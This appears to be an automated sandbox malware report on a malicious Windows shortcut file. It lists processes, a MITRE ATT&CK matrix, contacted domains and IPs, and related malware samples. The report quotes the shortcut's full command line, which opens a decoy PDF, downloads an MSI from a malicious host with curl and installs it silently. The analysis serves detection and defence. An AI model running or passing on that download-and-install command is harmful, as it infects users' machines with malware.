Source: Web Data.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Web Data.12.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Web Data.12.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Web Data.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\taskkill.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exe	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -slo c:\users\user\appdata\local\temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i c:\users\user\appdata\local\temp\bosfortuy.ms /qn | taskkill /f /im cmd.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 System Information Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
thUKanu6GD.lnk	19%	Virustotal		Browse
thUKanu6GD.lnk	13%	ReversingLabs

Source	Detection	Scanner	Label
http://559236.na3.to/gift/setup4391.msiV	0%	Avira URL Cloud	safe
https://drive-staging.corp.google.com/	0%	Avira URL Cloud	safe
http://559236.na3.to/gift/setup4391.msi	100%	Avira URL Cloud	malware
https://drive-daily-4.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-autopush.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-2.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-6.corp.google.com/	0%	Avira URL Cloud	safe
http://559236.na3.to/gift/setup4391.msi2	0%	Avira URL Cloud	safe
https://drive-daily-1.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-5.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-0.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-preprod.corp.google.com/	0%	Avira URL Cloud	safe
https://drive-daily-3.corp.google.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
p-defr00.kxcdn.com	185.172.148.132	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
559236.na3.to	188.114.96.3	true	true	unknown
a416.dscd.akamai.net	2.22.242.11	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
s28.q4cdn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://559236.na3.to/gift/setup4391.msi	true	Avira URL Cloud: malware	unknown
https://s28.q4cdn.com/favicon.ico	false		high
https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	false		high
https://chrome.cloudflare-dns.com/dns-query	false		high
https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.dr	false		high
https://duckduckgo.com/chrome_newtab	Web Data.12.dr	false		high
http://559236.na3.to/gift/setup4391.msiV	curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.whatsapp.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://duckduckgo.com/ac/?q=	Web Data.12.dr	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://m.kugou.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.office.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.live.com/mail/0/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.last.fm/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://powerpoint.new?from=EdgeM365Shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Web Data.12.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	Reporting and NEL.13.dr	false		high
https://tidal.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://docs.google.com/	manifest.json0.12.dr	false		high
https://www.youtube.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.instagram.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://web.skype.com/?browsername=edge_canary_shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://gaana.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://drive-staging.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	manifest.json0.12.dr	false		high
https://outlook.live.com/mail/compose?isExtension=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Web Data.12.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.messenger.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://unitedstates4.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
https://i.y.qq.com/n2/m/index.html	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.deezer.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://latest.web.skype.com/?browsername=edge_canary_shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://s28.q4cdn.com	Session_13385853608423166.12.dr	false		high
https://word.new?from=EdgeM365Shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://web.telegram.org/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://outlook.office.com/mail/0/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Web Data.12.dr	false		high
https://m.soundcloud.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://mail.google.com/mail/mu/mp/266/#tl/Inbox	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://cdnjs.cloudflare.com/ajax/libs/mathjax/	service_worker_bin_prod.js.12.dr, offscreendocument_main.js.12.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://drive-autopush.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://music.amazon.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://drive-daily-4.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://vibe.naver.com/today	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://unitedstates1.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data.12.dr	false		high
https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://open.spotify.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://twitter.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://excel.new?from=EdgeM365Shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://web.skype.com/?browsername=edge_stable_shoreline	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://drive-daily-5.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://m.vk.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.cloudflare.com/5xx-error-landing	curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.dr	false		high
https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfThis	History.12.dr	false		high
https://www.google.com/chrome	content.js.12.dr, content_new.js.12.dr	false		high
https://www.tiktok.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
http://559236.na3.to/gift/setup4391.msi2	curl.exe, 00000006.00000003.1292046582.000001BE71256000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1292839683.000001BE71256000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-daily-6.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://drive-daily-0.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://www.onenote.com/stickynotes?isEdgeHub=true	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.iheart.com/podcast/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://music.yandex.com	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://chromewebstore.google.com/	manifest.json.12.dr	false		high
https://s28.q4cdn.com/	000003.log.12.dr	false		high
https://drive-preprod.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown
https://clients2.googleusercontent.com	c3c0b809-94b6-4f44-893d-1b9e51a3b060.tmp.13.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://chrome.google.com/webstore/	manifest.json.12.dr	false		high
https://y.music.163.com/m/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://unitedstates2.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
https://bard.google.com/	2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr	false		high
https://drive-daily-3.corp.google.com/	manifest.json0.12.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.22.242.11	a416.dscd.akamai.net	European Union	20940	AKAMAI-ASN1EU	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.40.179.56	unknown	United States	16625	AKAMAI-ASUS	false
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
185.172.148.132	p-defr00.kxcdn.com	Germany	44239	PROINITYPROINITYDE	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.57.90.163	unknown	United States	35994	AKAMAI-ASUS	false
68.70.205.3	unknown	Switzerland	44239	PROINITYPROINITYDE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.96.3	559236.na3.to	European Union	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.6
192.168.2.24
192.168.2.23
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632262
Start date and time:	2025-03-07 21:39:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	thUKanu6GD.lnk renamed because original name is a hash value
Original Sample Name:	0a9302f5cbdcc6a3d75a904c947c9147.lnk
Detection:	MAL
Classification:	mal92.phis.troj.evad.winLNK@63/301@15/14
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 4.175.223.124, 204.79.197.239, 13.107.21.239, 142.250.186.46, 13.107.6.158, 2.23.227.215, 2.23.227.208, 48.209.162.134, 84.201.210.39, 199.232.214.172, 142.251.40.35, 142.250.72.131, 23.199.214.10, 94.245.104.56, 23.40.179.38, 13.107.246.40, 13.107.22.239
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, data-edge.smartscreen.microsoft.com, prod-agic-we-10.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, c.pki.goog, config.edge.skype.com, www.bing.com, prod-agic-ne-5.northeurope.cloudapp.azure.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, prod-atm-wds-edge.trafficmanager.net, b-0005.b-msedge.net, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, l-0007.config.skype.com, edgeassetservice.azureedge.net, business.bing.com, clients.l.google.com, msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com, dual-a-0036.a-msedge.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	file.exe	Get hash	malicious	Vidar	Browse
	ADFoyxP.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse
	desaremix.exe	Get hash	malicious	KillMBR	Browse
	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse
	Ocean-City.pdf	Get hash	malicious	Unknown	Browse
	Urgent Suspicious Scam Email.eml	Get hash	malicious	Unknown	Browse
	Details of the selected transactions_169371_389366169134432.pdf	Get hash	malicious	Unknown	Browse
23.40.179.56	http://monuadz.com	Get hash	malicious	Unknown	Browse
2.22.242.11	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse
	09.msi	Get hash	malicious	RedLine	Browse
	95.msi	Get hash	malicious	RedLine	Browse
	SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exe	Get hash	malicious	Unknown	Browse
	windows.ps1	Get hash	malicious	PureLog Stealer, Vidar	Browse
	https://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiy	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	UPS_ZI100035519.pdf.lnk	Get hash	malicious	MalLnk	Browse
	https://ncdmv.com/	Get hash	malicious	Unknown	Browse
	https://seieroebygdk-my.sharepoint.com/:o:/g/personal/morten_seieroebyg_dk/Ejxu7S81ekRMjqiJkW6WADwBVmUFVEVwgQ5ayasL1fZKQw?e=sbDbQe	Get hash	malicious	Unknown	Browse
185.172.148.132	http://ciso2ciso.com	Get hash	malicious	Unknown	Browse
	Final Call Smart Manufacturing Excellence Munich (196Mo).msg	Get hash	malicious	Unknown	Browse
	http://drawi.io	Get hash	malicious	Unknown	Browse
	http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.html	Get hash	malicious	Unknown	Browse
	https://www.drawnames.com/wishlist/edit/D0gYBJzjFoJ7rv0HFu_iKQ-/JAvmRE-y4vYaeZ2GN316lg-	Get hash	malicious	Unknown	Browse
	http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-	Get hash	malicious	Unknown	Browse
	https://www.drawnames.com/wishlist/draw/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-/4	Get hash	malicious	Unknown	Browse
	https://c3y3jw.webwave.dev/	Get hash	malicious	Unknown	Browse
	https://unrecognized-yahoo-activity.netlify.app/account/remove-unrecognize-apps/?email=	Get hash	malicious	Unknown	Browse
	http://bucolic-kheer-bd252e.netlify.app/	Get hash	malicious	Porn Scam	Browse
172.64.41.3	file.exe	Get hash	malicious	Vidar	Browse
	ADFoyxP.exe	Get hash	malicious	Unknown	Browse
	ADFoyxP.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse
	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse
	OPENBASE ATT09918_ 6TH_MARCH_2025 _.PDF	Get hash	malicious	Unknown	Browse
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse
	Map1.pdf	Get hash	malicious	Unknown	Browse
	q3na5Mc.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
p-defr00.kxcdn.com	http://ciso2ciso.com	Get hash	malicious	Unknown	Browse	185.172.148.132
	https://l24.im/RBD8OoV	Get hash	malicious	Unknown	Browse	185.172.148.128
	Final Call Smart Manufacturing Excellence Munich (196Mo).msg	Get hash	malicious	Unknown	Browse	185.172.148.128
	http://drawi.io	Get hash	malicious	Unknown	Browse	185.172.148.132
	Document-0191536.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	185.172.148.128
	http://productsthatcount.com	Get hash	malicious	Unknown	Browse	185.172.148.128
	http://idyllic-elf-955535.netlify.app/	Get hash	malicious	Unknown	Browse	185.172.148.128
	http://t6ceb4773.emailsys2a.net/c/258/8051645/427/0/475433/1/7220/750cd846a5.html	Get hash	malicious	Unknown	Browse	185.172.148.128
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	185.172.148.128
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	185.172.148.128
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	ADFoyxP.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	ADFoyxP.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse	172.64.41.3
	desaremix.exe	Get hash	malicious	KillMBR	Browse	162.159.61.3
	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse	162.159.61.3
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse	162.159.61.3
	ATTACH - kotak.com.htm	Get hash	malicious	Unknown	Browse	162.159.61.3
	q3na5Mc.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	http://pqpqpyj.sbs/av/avr08/index.php?lpkey=174043cdcee2702426549f3edfdcca41a099970167&trkd=omokeh.org&lpkey1=cuuncqujn1oc7393mcc0&language=de&scanid=cuuncqujn1oc7393mcc0&ip=147.161.235.77&t1=133&t2=%7Bt1%7D&t3=%7Bt2%7D&t4=49&t5=174123395189&dm=1&pbid=4598&uid=Tev3Ewws7LqtzrNjCqkamFhqO8Mhj2&t10=4833	Get hash	malicious	Unknown	Browse	162.159.61.3
a416.dscd.akamai.net	file.exe	Get hash	malicious	Vidar	Browse	2.22.242.105
	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	2.22.242.105
	ADFoyxP.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse	2.22.242.105
	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse	2.22.242.11
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse	2.22.242.11
	q3na5Mc.exe	Get hash	malicious	Vidar	Browse	95.101.54.115
	09.msi	Get hash	malicious	RedLine	Browse	2.22.242.11
	95.msi	Get hash	malicious	RedLine	Browse	2.22.242.11
	ESVoO7ywn5.exe	Get hash	malicious	Vidar	Browse	2.22.242.105
	SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exe	Get hash	malicious	Unknown	Browse	2.22.242.105
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	LtCPevm69G.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Poverty Stealer, PureLog Stealer, Stealc, Vidar	Browse	94.245.104.56
	ADFoyxP.exe	Get hash	malicious	KeyLogger, StormKitty, VenomRAT	Browse	94.245.104.56
	https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.html	Get hash	malicious	HTMLPhisher	Browse	94.245.104.56
	https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.com	Get hash	malicious	Unknown	Browse	94.245.104.56
	q3na5Mc.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	ESVoO7ywn5.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	Payment_Activity_0079_2025-2-23.vbs	Get hash	malicious	Unknown	Browse	94.245.104.56
	xn3nGSFdRn.exe	Get hash	malicious	Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	http://lploverar.best	Get hash	malicious	Unknown	Browse	23.57.28.161
	AaxpYFDQ32.exe	Get hash	malicious	Amadey, Credential Flusher, GCleaner, LummaC Stealer, Stealc	Browse	104.73.234.102
	file.exe	Get hash	malicious	Vidar	Browse	23.57.90.78
	phish_alert_sp2_2.0.0.0 (3).eml	Get hash	malicious	Unknown	Browse	2.16.185.191
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	92.123.12.139
	https://akronhousingorg.sharepoint.com/sites/akronhousing.org/_layouts/15/guestaccess.aspx?e=4%3ayoKuOs&at=9&share=ETxns0_uyAZOqbfnq1g451UBdlSB973uhVLb6tJxyt3tUQ	Get hash	malicious	Unknown	Browse	2.19.198.72
	gold.rim.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
